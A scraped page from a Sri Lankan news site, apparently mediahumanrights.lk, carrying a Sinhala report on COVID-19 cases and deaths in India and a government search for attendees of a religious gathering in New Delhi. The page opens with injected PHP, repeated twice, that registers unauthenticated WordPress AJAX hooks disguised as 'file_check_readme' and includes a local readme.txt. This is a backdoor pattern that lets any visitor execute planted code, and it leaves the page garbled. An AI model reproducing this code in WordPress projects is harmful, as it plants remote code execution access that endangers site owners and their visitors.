if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ඉන්දියාවේ මරණ සංඛ්‍යාව 35ක් - mediahumanrights.lk
mediahumanrights.lk
International News News

ඉන්දියාවේ මරණ සංඛ්‍යාව 35ක්

අසල්වැසි ඉන්දියාවෙන් වාර්තා වී ඇති සමස්ත ආසාදිතයින් ගණන ද 1,400කට ආසන්න වී ඇත්තේ, ඊයේ දිනයේ සොයාගත් ආසාදිතයින් 146දෙනෙක් සමගයි.

මරණ ගණනද 35ක් ලෙසින් දැක්විය.

මේ අතර රජයේ අණ නොතකමින් නවදිල්ලි අගනුවර පැවැත්වූ ඉස්ලාමීය ආගමික උත්සවයකට එක්වූ පිරිස් සොයා රජය දැවැන්ත මෙහෙයුමක් ආරම්භ කර තිබේ.

ඊට එක්වූ දහසකට අධික පිරිසක් දැනටමත් රජය වෙන්කරගෙන ඇති අතර ඔවුන්ගෙන් 24දෙනෙකු දැනටමත් නව කොරෝනා ආසාදිත බවට හදුනාගෙන තිබීම විශේෂත්වයක්.

(under the courtesy of adaderana.lk news web)

Related posts

හය වැනි කඩුල්ලේ සබඳතාව දැවැන්ත අවමානයකින් ශ්‍රී ලංකාව ගලවා ගනී

Shiran Viraj

බැංකුව කොල්ල කන්න ඇවිත් වෙඩි කයි

Shiran Viraj

රාධිකා කුමාරස්වාමි ජෝන් කීල්ස් අධ්‍යක්ෂ මණ්ඩලයෙන් ඉල්ලා අස්වෙයි

Shiran Viraj